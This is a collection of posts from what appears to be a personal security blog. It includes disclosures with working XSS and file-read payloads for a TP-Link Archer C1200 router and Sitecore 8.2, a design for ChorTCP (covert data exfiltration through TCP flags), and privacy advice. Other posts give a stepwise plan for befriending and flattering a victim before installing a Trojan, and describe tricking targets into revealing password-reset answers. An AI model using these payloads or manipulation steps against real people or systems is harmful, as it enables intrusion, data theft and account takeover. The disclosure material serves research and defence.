TP-Link wireless router Archer C1200 – Cross-Site Scripting

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]

Hello folks. An Input validation vulnerability was found in TP-Link Archer c1200 v1.0, which results in client side code execution.

[+] Unauthenticated

[+] Affected Version: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU

[·] Impact: Client side attacks are very common and are the source of maximum number of user compromises. With this attack, the threat actor can steal cookies, redirect an innocent victim to a malicious website, thus compromising the user.

[·] Reason: The remote webserver does not filter special characters or illegal input.

[+] Attack type: Remote

[+] Patch Status: Unpatched

[+] Exploitation:

[!] The Cross-site scripting vector can be executed, as illustrated below

http://hostname/webpages/data/_._.<img src=a onerror=alert(“Reflected-XSS”)>../..%2f

[-] Responsible Disclosure:

  • April, 2018 – Contacted TP-Link via their web based form
  • May, 2018 – No Reply yet
  • May 26, 2018 – Public Disclosure

TCP based covert channel (ChorTCP)

While researching on data exfiltration techniques and covert channels, I thought of making one of my own, dubbed ChorTCP. Though protocol over protocol tunneling is a well known concept but I really wanted to actually try to hypothesize one aspect and then implement it, just for fun. The abstract below is taken from the white paper, as is. The main benefit of this technique is that any deep packet inspection firewalls will not be able to see. The traffic will, at most, seem like a malformed traffic.

Introduction

ChorTCP is a covert channel created over TCP protocol. The overall concept revolves around the exfiltration of data without sending any data on the application layer level. This is accomplished by sending specially crafted packets with specific flags enabled — to the server. When packets generated are analyzed — they appear to be either random scans or malformed traffic.

Detailed description

The technique requires two components — a server and a client. The client is used to exfiltrate data and to be sent to the server. To bypass analysis and what data is being exfiltrated — flags are used. The advantage of this technique is that the sending and receiving protocol and the dictionary can be changed thus having many possible iterations of the same exfiltration technique.

The dictionary selected for this technique is the Morse-code cipher dictionary. Which has been modified for the current requirements of the technique. The details of the POC will be described later in this chapter but for now the protocol would be illustrated.

In Mores-code “.” And “-” are represented as short tone and long tone respectively. For sending Morse-code style data on TCP/IP network via the flags subtle changes were required. This would be explained later in the chapter.

Under the hood

The exfiltration protocol works with 4 Flags — [SYN, FIN, PSH, URG]. This technique is versatile and if required the flags can be changed.

The data exfiltration is performed using the SYN and URG flags. The PSH and the FIN flags are used for delimiter purposes. As mentioned earlier that the dictionary used was that of Morse-code and then was changed to fit the current technique. The “.” And “-” was replaced with SYN and URG respectively. Moreover — few other characters were also added. Thus — converting the Morse-code dictionary into:

 

Any data that the client program encounters — is encoded and then sent to the server on a specific port. The server does not open a socket to listen on the port — but in fact sniffs the traffic for the mutually decided port. The protocol works as follows:

As per the data which is to be exfiltrated each character is converted into code of SYN and URG. Which means that the character ‘r’ in the word root is converted to ‘SSSUUSU’ which would send SYN packets 3 times and then send 2 URG packets and then a SYN and an URG.  The server on the other end would convert the incoming SYN and URG into ‘r’.

The protocol explained:

  1. The protocol for a non-NAT environment is illustrated below [Implemented in the POC]:

 

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|URG|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|FIN|—> Server

This packet tells the server that end of letter has reached

Server —|PSH|—> Client

The Server responds with acknowledgement by sending a PSH packet

Client —|SYN|—> Server

The client resumes the next character.

Once the word has reached, the client sends a FIN + PSH packet to the server informing for an end of word. This process keeps going until the end of data has reached.

 

  1. The protocol for the NAT network is illustrated below. It is to note that — this option is yet to be implemented and would not be a part of the POC.

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|URG|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|FIN|—> Server

This packet tells the server that end of letter has reached

Server —|PSH|—> Client

The Server responds with acknowledgement by sending a PSH packet

Client —|SYN|—> Server

The client resumes the next character.

It was observed that, in the environment where the implementation was tested, Network Address Translation for the FIN, PSH and URG packets was not happening. It was tested against TP-Link home wireless router and F-Secure Sense. Thus, the solution of removing the PSH packet from the protocol was hypothesized, this would remove the overhead of the Client waiting for an acknowledgement from the Server.  

POC (ChorTCP)

The POC is implemented using Python and Scapy library. The POC would be uploaded soon. The code can be downloaded here…

Way Forward

The SYN based scanner would be implemented on the client side to first detect which ports are accessible outbound from the Target box and once determined — the client would start using that port for exfil. Moreover — as the server would be sniffing traffic on all the ports but when it receives a packet with same source and destination port — it would only start sniffing that port.

This was a very basic concept and has been tested on Non-NAT networks. Though more sophistication, as for example, adding functions to detect if the firewall is blocking the requests etc would be added later on.

 

The Art of Privacy – Part 3

This is the best part of the whole series, as in this part I will tell you, what to do to protect yourself from prying eyes, whether the prying eyes are of hackers, or oppressing regimes (This is such a relative term 🙂 ). It’s usually such a good feeling when you realize and appreciate that your thoughts are your own, imagine if some of us could read your mind and could siphon off anything that you think and then mine the data and extract the useful bits of information and then use it. Well this is what is going on nowadays, in the cyber world, which has already been discussed previously (briefly) in this series.

So, how do I become invisible to everyone and even to a point where one has contingencies to if life turns into an iRobot’s plot.

The privacy protection can be divided into two parts:

Physical – In context of cyber

Cyber

Physical protection entails protection of your credit card data, protection of your phone’s screen information. Please keep in mind, this is not a tutorial to learn Kungfu and protect your wallet or phone from thieves, this is more in the context of what data an attacker can extract by not even making contact with you and how you can secure it, so that all the attacks are rendered unsuccessful.

Nowadays, if we notice, all credit/debit cards are contact-less, which means, in layman’s terms, you can just touch the point of sales machine with the card and you are good to go. It is a well-known fact that any threat agent can use cheap hardware to extract information from the credit card from afar. Same goes for the bus cards, tram/train tickets, etc. They all use RFID technology now.

The easiest way to protect them from an attack is to use a wallet with RFID protection. You can find many different kinds of wallets in the super market. If you love your own wallet, or your wife gave that as a gift and if you won’t use it, you will be sleeping outside of your house, then my friends, there is another solution, you can easily buy RFID protection sleeves which can hold your cards and then you can put them into your wallet. You can buy them from anywhere as well. I have been using the sleeves as well in my wallet. I got the F-Secure ones, work pretty well.

Information from the phones can be protected by adding a privacy screen protector on your phone. It comes for Android devices and iPhone/iPad/iWhatevertheycomeupwithNext.

Cyber based protection entails everything which is done online or offline, but dealing with the non-physical, bitbytes!! In case of Cyber, the threat actors have already been explained in the previous articles of this three part series.

The first thing one must and I say MUST do, is to install a VPN. VPNs are virtual private networks, which in a nutshell, encrypt all traffic between you and their server. Think of it as an underground tunnel which uses a special train which makes you invisible so you can easily pass through any barriers, and exit the city you want to exit undetected and then carry on. Usually when your traffic is going through the network, it looks like this (again a lot is going on but just to explain my point, it is illustrated so simply):

You ==> Your ISP — |Prying eyes| ===> Google/Facebook/Instagram/Blah/Blah and Blah

When you are going through a VPN:

You =|Encrypted tunnel|=> VPN server (ISP? WHO/WHAT?) ===> Google/Facebook/Instagram/Blah/Blah and Blah

So, that was that, VPN is a must if you want to stay anonymous, of course, one should never abuse this. Never do anything illegal!

The VPNs which I have personally used are F-Secure Freedome and Private Internet Access, which are quite good, with respect to price, log retention, speed.

Secondly, browser addons are your best friends. Addons like NoScript, Disable WebRTC, HTTPS Everywhere, uBlock Origin, User-Agent switcher. These are some of the addons for Mozilla Firefox. If you are a Chrome user then find equivalent addons.

Using proxies is usually not a good option to anonymize your traffic. As using WebRTC one can get your real IP, unless it is disabled on the browser side. Furthermore, by using Javascript one can extract your real IP. So, in short, don’t use proxies.

TOR is another good example of how to keep yourself anonymous. It is to note that TOR works as a proxy but it is untraceable. The operating system as well as all other apps which are not proxy aware and have not been explicitly provided, the IP for the proxy, they will connect to their respective services normally, and not through TOR.

Just to remember, if you are using TOR, never use your credentials on websites which do not run on HTTPS.

These are some of the things that Privacy health-conscious people use to protect themselves. I would recommend this to all the great readers out there.

Stay Safe.

 

~Peace

The Art of Privacy – Part 2

The biggest threat to privacy is the attitude of “AH, what would someone do with my email address, phone number or social security number”. Thanks to the awareness in security and security terminology becoming a fad and the names of attacks becoming more and more attractive, non-security savvy people are starting to somewhat understand the tricks malicious attackers use to lure people into giving out their private information.

Unfortunately, this isn’t enough. Privacy threat actors range from a 13 year old sitting on a computer to state sponsored hackers to law enforcement to advertising agencies, which technically are working within the bounds of the law and aren’t doing anything illegal.

The problem, which I have been talking for ages, is that there is so much unprotected personal information available on the internet that you cannot pin point and blame a specific person for taking the data and using it. We then have a problem of data leaks, for example the recent Equifax data leak. Data leaks and public dumps are a recent trend. In the early 2000’s there were more breaches because, well SQL Injection was new, even now SQL injection is almost 50% of the times, the reason of a breach, imagine when it was new, and google dorking was new, how many databases would have been dumped and would have roamed around in the underground but they never made the news or they weren’t available for anyone to download.

The dumps of emails and passwords leaked from Linkedin, Twitter etc. are now on several websites. As an example, please find the two websites below:

https://haveibeenpwned.com

https://hacked-emails.com/

Technically they do not show you the password for anyone else but just tell you if your email is in the hacked databases list, but they have all the raw data so…

I have been using a website called Pastebin for years now, which is quite valuable when it comes to find your leaked information. Google is also a very well-known platform for finding leaked information using google dorks.

Well, if we talk about data leaks, one can argue that it is not an individual’s fault that the data got leaked. It was because of an Apache Struts (Unpatched, though the patch was released like ages ago) vulnerability, 🙂 that the server got pwned! Yes, so that is not the individual’s fault. It is the individual’s fault when he is in the military and gives the whole detail about what he is doing and on which technology, so that anyone can track him down. What happens when people do that, you ask? ICWATCH happens!!!! It is also the individual’s fault, when he puts all his/her pictures public on Facebook or Instagram or any other social networking website. What someone can do with my picture from Facebook, you ask, it is not a social security number or your phone number, you say? I would just give an example, or two, of what they can do, apart from selling your picture to advertisers or a bad bad man getting a hold of your pictures, extracting the GPS location embedded into the pictures, thank you smartphones, and get your home address:

Example: So let’s talk about cryptocurrency, Bitcoin and the whole shebang. Oh, so, cryptocurrency is untraceable? Right? What do we do? Well, what the high end exchanges now do is that they require your picture taken from a camera and any photo-ID, for you to be able to get registered to that exchange and setup a wallet and so on. After that whatever transaction you do can be chained back to your account and inevitably to you. Unless you are using Monero!! So, about the attack, let’s call the attacker, “Evil Joe”! Evil Joe gets you selfie picture from Facebook which he/she conveniently finds online as it is public. Uses that picture for first round of verification and in the second round, uses a different picture and photoshops it onto a photo-ID, scans it and uploads it. Next, sets his username and password and boom, he has stolen your Face identity. Now whatever transaction he does, comes back to your face and as most law enforcement agencies have facial recognition, they will contact you and you are in trouble, at least until they are sure that you weren’t involved.

One, other scenario that I would like to briefly describe is that for example you have facial recognition on your Samsung S8. A thief steals your phone or purse (Ladies), what he can do with it, search your name on the internet, on Facebook, if he finds your public picture somewhere, where your face is prominent, he can use that to unlock your phone.

There are many other attacks, social engineering being the most effective, but for that I would refer to different books as this has been covered thoroughly by many people.

Recently, I saw a very well renowned political figure of A country, on twitter. She shared a picture of a document where she did not think of removing the name, phone number and social security number of another government official. I think that was because she has no concept of why exposing social security number is a very bad thing.

In the third part, I would explain how to protect yourself from these threat actors and how to be anonymous and invisible to prying eyes.

~Peace

The Art of Privacy – Part 1

This is a three-part special. The first part of this three-part special would include, what privacy means to a normal person, how it impacts the normal day-to-day life of that person, the facts about what is going on in the cyber world, in terms of privacy.

The second part would comprise of the mistakes that are made by people and the mindset that people have about internet privacy.

The third and the final part would include how you can protect yourself against attacks, even if you aren’t computer savvy. You will also be introduced to technologies being used nowadays to defend against privacy breaches.

Part 1:

Lets start with what privacy is, though all of you might already know what it is. Privacy is the right of an individual to keeps his/her’s private stuff, private. Technology is a part of our life now and unfortunately, the threat landscape is quite big, in terms privacy.

You might have heard about IOT (Internet of things) which means, all the devices that are connected to the internet and to each other, for example Cameras, locks, fridges etc. There have been many security concerns about IOT devices, which I will not be covering here.

Technology has become closely intertwined with our daily lives. Cell phones, for example, instead of having different devices for different tasks, now smart phones have everything in one package, such as GPS, 3G/4G, Bluetooth, NFC, which are technologies which have many applications in our day-to-day life. Internet, a technology that we are so dependent on, that a little disruption in it causes serious discomfort to us. These technologies, can be attacked to invade one’s privacy.

Security and Privacy have always had a love/hate relationship. Complete security requires privacy breach at some level, which becomes a problem in case of complete privacy. Last year General Data Protection Regulation (GDPR) was adopted in the EU which has several detailed points about the protection of privacy for the EU citizens and residents. This is a very good thing, but to be honest, this protects against our data on services such as Google, or any other corporate entities. What about hackers, intelligence agencies, cyber armies? How should we protect ourselves against them? How can we keep our personal information personal? Though I will tell the good readers on how to protect one’s privacy online, in the part 3 of this article.

Now, I would like to briefly talk about the attacks against privacy. Recently, we heard about NSA snooping into mobile networks and reading SMS etc. Due to the leaks, the world now knows about Hacking Team and Finfisher, which are the companies who blatantly sell command and control implants to governments and even law enforcement agencies, which were initially used to spy on activists, journalists, etc. Nowadays, due to the threat of increasing cybercrime, the implants might be used against normal people, if they are persons of interest to law enforcement. For example, the recent Surveillance law in Germany, which empowers the German police to read WhatsApp messages of people who become person of interest to the police. Though direct interception is not possible, most probably, they would be using some kind of social engineering technique to install the police controlled implant onto the cell phone of their target. Similar surveillance powers are or will be given to the police in the UK.

To be very clear, if the person has committed a crime and/or, well, if he is a bad guy, which is quite hard to know, unless it is Tom Cruise’s Minority Report, and there is a pre-crime unit, but still, I am completely in favor of this surveillance law, in that case. But knowing which of the suspect is a real bad guy and which of the suspects is an innocent, is quite hard to know, thus there would be quite a big range of false positives, who would lose their privacy as collateral.

There have been so many cases of identity thefts in different countries due to breaches, leaks, phishing etc. With your identity stolen, you can lose your bank accounts, can end up in the police wanted list, can come under serious debt, etc. Apart from identity theft, GPS spoofing, where you can be sent somewhere else and the information that you contain may be taken by force, cell phone hacking, television hacking and voice snooping, implants to intercept internet traffic at the ISP end, SMS interception, SS7 based attacks, all of which are attacks against normal people and which are used to compromise confidentiality and breach privacy of the intended targets.

I would be, in the end of this three-part article, mention different books covering privacy and how to be invisible.

Thanks for reading.

Part 2 would be coming out soon!

Peace!

Want to be heard and can’t register a domain?

Back when I had dial-up internet, I used to host stuff on my computers and give my public IP to friends so that they could enjoy or make use of, what I had to share. Back then there wasn’t any Facebook, hi5, orkut, or any chat mobile apps. The only cool thing we had was IRC (\\// Live long and prosper). I felt so empowered that I could host something on my computer and share it with friends, ok, so what if I got DOSed (denial of service), many times and my computer froze because, well I had windows 98 installed. That was the time when “Ping of death” was a thing. Good times though. Coming back to the topic, as I mentioned that I could host stuff online and ask people to connect to my IP, well the bandwidth was very poor so that model didn’t work so well, and did I mention, I got DOSed, many times. Nowadays, there are a lot of online services, free website hosting like “110mb.com, wordpress.com, blogger.com, etc”. Many people use these services and are super happy with it.

Sometimes you want to share something and want to keep it on your own computer. How do you do that? Well, some of you might say: “We have a DSL/Fiber connection, we can setup reverse NAT and we are good to go”. My answer to them is that what if your public IP changes? That becomes a problem! I recently saw this television program about Darknet and how only bad people use it and if you are a criminal, then you are on a Darknet. Well, all this is quite dramatic to be honest. Yes, criminals use it, but it wasn’t designed for them, they use it because of the anonymity features.

To solve the above mentioned problem, TOR can be used. Yes, TOR is an anonymizing software and can be used to host websites or any kind of service. There are some very simple steps to set it up. You can set it up on your computer or a raspberry pi. Follow the simple steps to install a hidden service:

  1. Install TOR, apt-get install tor
  2. Edit Tor configuration file: nano /etc/tor/torrc
  3. Find the section with hidden services and edit: HiddenServicePort <port on onion> 127.0.0.1:<mapped internal port>
  4. Setup a hidden service directory and add it to the config file </blah/hidden_service/>. Chmod it to 700 (Some times TOR complains about lose permissions)
  5. Run tor.. Get the onion domain name from the hostname file.
  6. Have fun!!!!

Once it is setup you can see your .onion domain name in the hostname file, but to access it you have to be in TOR network, but there is some good news as well, you can access it from the internet as well, via Tor2web. It is rather simple, really, if you have a domain, “myblahblahblahdomain.onion”, you just add a “.to” to the end and you are good to go. So, the end URL would be: “http://myblahblahblahdomain.onion.to/”.

That is it, you are good to go and enjoy your free hosting.

Downside of keeping everything public – ICWATCH

I have been writing and preaching about Social network information harvesting and why it is a bad thing (Check out the post here). I recently stumbled upon something, which is, publicly known though, but still worth mentioning. The mentioned “something” is a very good example of why too much information about one’s self is never a good idea.

I was having some fun with Riddler the other day. For those who do not know what Riddler is, well it is F-Secure’s search engine for web domains and much more. Unlike Shodan where all ports are scanned and then the headers are saved in a database, Riddler can be used to query about specific domains and subdomains and get some very very interesting information. So, as I was saying, that I was having fun with Riddler and I stumbled upon a strange subdomain of (Strange subdomain).

The ICWATCH, contains public database of mainly LinkedIn profiles of people in the United States government employees. Though the website is publicly known. It was quite astonishing to see how much information people have posted on their Linkedin accounts. It makes sense if someone is in sales or normal private sector job, but giving so much information and revealing what the person does, for intelligence community is, well not advised, in my opinion.

Back to the point, open-source intelligence (OSINT) is completely legal and any person/agency can easily gather information about anyone without committing a crime. I usually talk about advertisers, malicious hackers, social engineers etc, who use this to take advantage of the information collected and harm innocent users. People should keep in mind that tracking people across multiple social networking platforms is a trivial job nowadays, for a skilled hacker.

It is very important, not to disclose personal information on the internet. Especially social networks like Linkedin, Facebook, etc. Sharing personal stuff is never a bad thing, but people should be smart about what they share. If you are working for the government, there is no need of writing everything about what you do, on your Linkedin profile.

Peace!

Sitecore CMS v 8.2, cross site scripting & arbitrary file access

Hi folks,

Multiple vulnerabilities were found in the Sitecore version 8.2. Which were reported to Sitecore CMS on the 5th of May,2017. A patch was released on the 27th of June, 2017. It is recommended to update the Sitecore CMS installation. The exploit is being made public after the patch has been released.

Exploit:[CVE-2017-11439, CVE-2017-11440]

Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: usman@xc0re.net

Disclaimer: Everything mentioned below is for educational puposes. The vulnerability details are mentioned as is. I would not be held responsible for any misuse of this information.

Summary:
Multiple vulnerabilities were found in the Sitecore product. The vulnerabilities include two instances of arbitrary file access and once instance of reflected cosssite scripting.

1: Arbitrary file access:

– Description:

The vulnerability lies in the tools which can be accessed via the administrator user. The vulnerability exists because there is no bound check for absolute path in the application, that is, if the absolute path is provided to the vulnerable URL, it reads the path and shows the contents of the file requested.

– Exploit:
1. Once authenticated as the administrator perform a GET request to the followiung URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini

2. Once authenticated as the administrator perform a POST request to the followiung URL:

POST /sitecore/admin/LinqScratchPad.aspx HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1

__VIEWSTATE= <OMITTED> &__VIEWSTATEGENERATOR= <OMITTED> &__EVENTVALIDATION= <OMITTED> &LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%5Cwin.ini&Fetch=

 

2. Reflected Cross-site Scripting:
– Description:
The application does not sanatize the USER input which allows a normal authenticated user to exploit this vulnerability.

 

– Exploit:

POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: <OMITTED>
Content-Length: 518
Cookie: <OMITTED>

&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A// <OMITTED> /sitecore/shell/Applications/Tools/Run&__CSRFTOKEN= <OMITTED> &__VIEWSTATE= <OMITTED> &__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(document.cookie)%3B%22%3E%3C%2Fiframe%3E

++++++++++++++++++++++++++++++++++++++++++++++++++++

Time-Line:

  • Initial inquiry – May 5, 2017
  • Vulnerability advisory submission – May 5, 2017
  • Patch release – June 27, 2017
  • Publicly released – July 3, 2017

 

 

Social Network Information Harvesting (SNIH)

Social Networks ! For those people who do not know about the social network , what it is and what this blog post is all about, well, here is a quick introduction.

Social Network is

People share their personal or business information freely on these websites. Though the privacy policy is pretty customizable and one can exactly show what one wants and hide what one does not want people to see. Despite of all the security and the privacy, information can get leaked. Many of these social networks constantly change their privacy policies and at one point when u upload a picture it is automatically set to your privacy settings and at another time, its public for the world to see, You constantly have to check again and again whether the privacy of the material is public or not. For example: We performed a controlled check through Facebook to prove our theory and what happened was that most of our friends profile pictures were public and when we contacted them, so they were all saying the exact same thing that the last picture they uploaded was private and now this one became public automatically when they uploaded it.

The main point of this discussion is not to find flaws in social networking websites but it is that security gaps are inevitable and all of our information is on these giant networks and for any reason if the information gets leaked, then you are at a loss. Now this is a great thing for Spammers, who harvest email addresses and other personal information.

Social Network Information Harvesting is basically defined as gathering information about people,  available on the these social networks.   Social Network Information Harvesting can be a service for different kinds of people. Law Enforcement, Criminals, Spammers, Hackers, Intelligence.

SNIH can be applied in many scenarios and the repercussions of this can be quite serious, not for the attacker, but the victims.

SNIH Scenario: [The Scenario is based on Facebook]

Usually what SNIH implementer do is that they create a small game or an application for the users to play or access on the Facebook. Most of the applications ask for permissions like email, statuses, friend-list etc. Now if it is a legitimate application then its a blessing but if it is a malicious one then you can say good bye to any privacy set by the user or the Social Network.

Now the information gathered or harvested can be used to find trends for analysis. This analysis is useful to Law Enforcement Agencies. If personal statuses are harvested then one can determine the tendencies in a person. Similarly If people with malicious intent get hold of this information then, the question arises that except for the obvious, Email Spamming, Harvested pictures selling and buying , Personal information Stealing , cell phone numbers harvesting, what else can they do? Well this takes us to our second Scenario ..

SNIH Scenario 2 : [Disclaimer : This Information is for Educational Purposes. We will not be held responsible for any misuse of this information]

In this scenario we will see an attack that can be carried out by hackers against the innocent users. Though due to two factor authentication this attack might not work but most of us do not opt for two factor authentication.

The attack is on some users email address. Usually when we go to “forget your password”, the system asks us a secret question, which we have to answer in order to reset our password. Now if the hacker goes to some targeted users email and does the above mentioned procedure and for example the secret question is : my favorite pets name. Keep in mind that this account was made some years back and the person doesn’t even remember the question he or she kept, let alone the answer. Now comes the part where a little social engineering would help alot. The attacker goes on Facebook and if he or she knows the person who is targeted then its a walk in the park, as most of the users information is shown on his or hers profile page or home page, but in this case he would have to ask him or her for the answer. Now if the person is a stranger, what the attacker has to do is to add the target user and start a conversation with him or her and between the chat, after a day or so, he can casually ask about pets and other stuff and then slowly ask : I just bought a dog, what name should I give it  and most probably in the users mind , in his subconscious, there is an 80% chance that he or she would tell you the same name. Once the attacker gets the hold of the answer, he just has to go to the email providers account and enter the answer and BOOM ! He is in !

Now what exactly happened was that the attacker used the information available on one social network against another network. The example above requires a little bit of social engineering but usually the questions are my aunts name etc and that can easily be extracted from the information provided by the user on his profile.

To conclude, it is safe to say that Social Network Information Harvesting is wrong because it doesn’t matter if the law enforcement agencies use it or any other people with malicious intent use it, the point is that the user doesn’t know that the information is being harvested. This is in itself a crime whether Law Enforcement is using it or any other person is.

[This is a re-post of the original, posted on 20th of March, 2013, on Xc0re blog.]

Psychological Warfare

Human Beings are stupid by default ! Human Stupidity never fails to amaze any one. We do very very stupid things , unknowingly of-course. This article is about how hackers or any one can tap into the human mind and take advantage of it in every way possible , usually called exploitation. This is either taught or some have this talent by birth for example people like Kevin Mitnick.

Before writing this blog post I just read a tweet on my Twitter Bot that “… do not worry about the Facebook cancellation email” , usually sent by hackers , to fool the innocent Facebook users in giving off their username/password to the hacker. It kept me thinking that why does this happen , why do people fall prey to such scams ! Even if they are technical or not ,they fall for it.Why does this happen?

For an introduction, I would like to say that usually this happens because the hackers know your weaknesses and by you  I mean every body. Hackers exploit these weaknesses to gain username/passwords and other information , usually called Social Engineering ! This talent can be weaponized and used to overthrow governments , start wars , financial gain etc. Once this talent is weaponized and used , it is called Psychological Warfare.

Psychological Warfare is actually mind games on steroids ! The applications and scope of Psychological warfare is broader to an exponential level.  Now I would tell you the process of psychological warfare used by hackers , a shopkeeper , Governments , Military etc .

Exploiting Human Selfishness

Human beings are very selfish ! Once a great man , who is my teacher as well as a very good friend argued that human beings are very selfish ! They do nothing selflessly and I was against the argument and gave many valid points as loving my family or my parents , giving stuff in charity etc so how is it not a selfless act , I don’t get any thing in return. He smiled and said , doing charity helps your conscience to be at peace. You love your parents because it gives you satisfaction. You don’t do any thing that doesn’t give you satisfaction, hence its selfish at some level. Well my point being is that human beings are selfish.  Every one has created his/her world around him/her and they just want to gain any thing and every thing from it.

Coming back to the topic , to how this is exploited. A simple example , every one likes free stuff , a hacker throws a USB flash disk on your door step or in your lawn , one would definitely pick it up and bring it home, well from a hacker’s perspective , any virus lurking in the usb will be executed and the computer would get infected and the usernames and passwords for your facebook , yahoo , hotmail etc would fly off to the hacker. Now in the second example as I mentioned earlier , the current scam for facebook cancellation message in the inbox . Why is everybody clicking on the link and getting hacked? Now here is a thought process that would start in my mind if I didn’t know about this , as soon as I would get this message I would say ” Niaah dude , its so fake ! ” and close the message window. Then after an hour or so I would think , what if the message was legit ! I mean what ever any one is saying , they didn’t get this message , I did!!! My Facebook account would be deleted , and I would be in loss ! The hell with it , I just have to goto the link and get it over with. After that I go onto the link and get hacked happily , but  who cares  atleast I saved my account from cancellation , so what if I got hacked but at least it would not get cancelled.

I hope my dear readers got the Idea !

Exploiting The Human Ego

You must have heard the sentence , ” I am right !! “! Me , Me , Me , I don’t care who you are and what your saying , I am right 100 percent. You must have seen your Bosses , Elder siblings , Teachers  etc , giving these statements. Now what is the best way to turn a no to a yes , in a Boss’s case ? You say : “Sir you are the best boss ever , what ever you say is right but if , though I don’t know much compared to you. Your knowledge is much more , but if you could accept blah blah blah , it would be great. I so want your input in this blah blah ! With out your input this blah blah is nothing. Please accept this !! ” There is a 80 Percent chance , No would change to a Maybe and 60 percent chance that No would change into a YES !!! Every one loves an Ego boost !

Hacking an account using social engineering and this technique.

Phase 1 :

Chat with your victim , for a while , and find a common subject. Once that is done , start the conversation about any controversial thing but never start giving the comments , for example : say .. ” I don’t know what this country is coming to , or what this school is coming to ! ” If the guy is a musician , say something that there aren’t many bands in the school and the whole music scene is getting destroyed and I think your band is the best there is ! The word flattery should come to mind  !  and then you will notice the guy would start giving his comments, because every one has problems , no one is happy with what he has . Just listen to what he says and just say :” Yeh!  man exactly ” etc ..

Phase 2 :

Take his email address , skype etc and him up ! Befriend him to a point where he starts trusting you. Then once done start the social engineering attacks. Install a Trojan onto his pc , and the list goes on !!

See how a little ego boost helped you gain valuable information. The scope of this blog is restricted to the hacker attacks. This can very easily be applied in real world , with real problems.

Intercepting and Messing with the Thought Process

Every one has his own thought process. If you say A in a room of  three people, all three people sitting in the room will start thinking of some thing different. The point is to make them think the same thing as to what you are thinking. This is usually achieved when one doesn’t give time to think and bombards ones own thoughts onto the people listening.

When ever a group of people come into a room , or a classroom , they have their own thoughts . Naturally the human brain is in defensive state and the people in the room do not grasp or accept at first, what the teacher is saying. The key is to get to their level and talk about some thing of interest. Human mind has a vulnerability ! To explain that I would give an example : If two people are sitting in a room and a third person is telling his point of view about A Topic , the other two wont accept at first , but ass soon as he finds a common ground , say C , now they talk about C for 10 minutes. The brain naturally put its guard down , and the weakness is that after that every one would agree on Topic A and also any other Topic !!! So one has to make a common base, the rest is all easy.

The second way to mess with the thought process is not to be that desperate to convince ! Once that happens , if any one listens to what you say , no matter how absurd , will first refute the logic but when they will notice that the argument that you are giving is suggestive but not desperate , they will accept it eventually ! Human mind requires time to process the input.

Exploiting the Lack of Concentration

Every one loves their own thing. For example if one person likes reading love stories , he/she would have zero concentration if they read or are forced to read a sci-fi story. Now this is the thing that the hackers exploit . For example for an English professor , if there is no poetry then its  useless. Now if she gets an inbox message by say the hacker , posing that he is from Facebook etc and the message is so long , with authentic logos and every thing ofcourse  , she would skip every thing and goto the end ,where there would be a link to the hacker’s page and boom , the English professor got , as they say “pwned!”

Lack of concentration is a major factor for these attacks to be so successful.

These were some examples of the Human Weaknesses that are exploited during a Psychological Warfare.  I did not mention how to over throw governments etc because for that I would have to write a whole book ! As this blog is related to Hacking and Security thus I had to stay in scope.